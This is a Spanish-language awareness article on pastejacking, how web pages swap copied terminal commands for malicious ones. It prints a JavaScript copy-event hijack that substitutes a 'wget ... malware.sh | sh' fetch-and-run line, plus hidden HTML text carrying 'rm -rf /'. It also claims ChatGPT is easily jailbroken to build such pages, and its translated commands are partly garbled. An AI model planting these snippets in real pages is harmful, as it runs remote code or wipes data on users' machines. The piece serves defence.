Desde computadoras hasta teléfonos móviles, copiar y pegar prevalece en todas partes. Hace la vida más fácil y le ahorra tiempo ya que no tiene que escribir comandos largos ni textos redundantes. Sin embargo, si no eres lo suficientemente cuidadoso, puedes ser pirateado simplemente copiando y pegando comandos en la terminal de tu computadora.
Aprendamos cómo copiar y pegar puede hacer que te pirateen y qué debes hacer para evitarlo.
Ya sea que sea nuevo en el uso de la línea de comandos o sea un veterano, puede verse tentado a copiar y pegar comandos de Internet para ahorrar tiempo y realizar el trabajo real. Sin embargo, debe tener en cuenta que los sitios maliciosos en realidad están utilizando cuadros de código como armas para inyectar código malicioso cada vez que copia y pega comandos directamente en la terminal.
Estos actores maliciosos están utilizando varios trucos de interfaz para ocultar comandos maliciosos detrás de un código que parece inofensivo.
Un comando comosudo actualización de apt-get && actualización de apt-getNormalmente debería actualizar los repositorios y actualizar los paquetes en un sistema Linux. Sin embargo, si no lo sabe y copia y pega este comando directamente en su terminal, es posible que sin saberlo esté ejecutando código de malware con privilegios de root debido a lasudoprefijo.
En el peor de los casos, esto podría resultar en una toma total de control de su sistema o incluso en un ataque de ransomware. Pero, ¿cómo hacen esto los actores de amenazas? ¿Cómo se pueden ocultar comandos maliciosos detrás de código inofensivo?
Cómo funcionan los exploits de código malicioso
Este exploit se puede llevar a cabo utilizando JavaScript ingeniosamente diseñado o incluso HTML básico. JavaScript tiene un mecanismo llamadoOyente de eventos. Los eventos son acciones que pueden ocurrir en el navegador, como hacer clic en un botón, enviar un formulario, mover el mouse, presionar teclas o cambiar el tamaño de la ventana.
ElOyente de eventos, como sugiere el nombre, permite que su aplicación web reaccione a ciertos eventos desencadenados por la acción del usuario. Las páginas web maliciosas aprovechan este mecanismo legítimo y útil capturando el evento en el que un usuario copia texto y reemplazando el texto inofensivo con código malicioso.
Aquí está el código de explotación principal utilizado para crear la imagen de demostración:
<script>
document.addEventListener('copy', function(event) {
event.preventDefault();
const copiedText = "wget https://localhost:8000/malware.sh | sh";
event.clipboardData.setData('text/plain', copiedText);
});
</script> Aquí hay otra demostración que no requiere JavaScript y usa HTML básico:
<p>
sudo apt-get install google-chrome-stable
<span style="color:white;font-size:0pt;">rm -rf /</span></p>
Esto crea un texto blanco invisible, que oculta efectivamente el comando malicioso “rm -rf /” y el<br>La etiqueta crea un salto de línea para que algunas terminales ejecuten inmediatamente el código al pegarlo. Se podría pensar que se requieren conocimientos sólidos de programación y desarrollo web para llevar a cabo este ataque, pero, en realidad, es bastante fácil.
Incluso si un atacante no tiene ningún conocimiento de JavaScript o desarrollo web, puede crear malware fácilmente utilizando ChatGPT. Con las indicaciones adecuadas, uno puede hacer jailbreak a ChatGPT fácilmente y hacer que cree páginas web maliciosas que utilicen este truco.
Cómo puedes protegerte
No existe una forma concreta de protegerse contra ataques de códigos maliciosos. Claro, puedes no permitir JavaScript para sitios sospechosos pero, por su naturaleza, probablemente no te permitirán navegar sin JavaScript activado.
Además, para el método CSS (Hojas de estilo en cascada), no existe una defensa concreta contra comandos maliciosos ya que sigue siendo un código CSS válido (es decir, no tiene nada de malo, pero la intención sigue siendo maliciosa). La mejor manera de protegerse sería simplemente seguir una higiene básica en Internet y ser ingenioso.
No visites enlaces desconocidos y asegúrate de pegar siempre el comando que estás copiando de Internet en un editor de texto antes de pegarlo en la terminal. Cíñete a recursos de código legítimos y de buena reputación para asegurarte de no recibir código malicioso en tu línea de comando.
Además, algunos terminales, como el terminal xfce4, vienen preequipados con protección para copiar y pegar. Mostrará una ventana emergente que le dirá exactamente qué se ejecutará tan pronto como pegue un comando en su terminal. Comprueba si tu terminal también tiene un mecanismo similar y actívalo.
La ejecución de código malicioso es muy peligrosa
Incluso si tienes instalado un antivirus, ciertas formas de ejecución de código malicioso aún pueden traspasar las barreras protectoras de tu dispositivo. Por eso es fundamental tener cuidado con el código que copia en línea y emplear medidas de protección siempre que sea posible para mantenerse a salvo.

![¿Cómo mover aplicaciones a la tarjeta SD Xiaomi/Redmi de 4 formas? [Debe leerse]](https://elsefix.com/statics/image/placeholder.png)







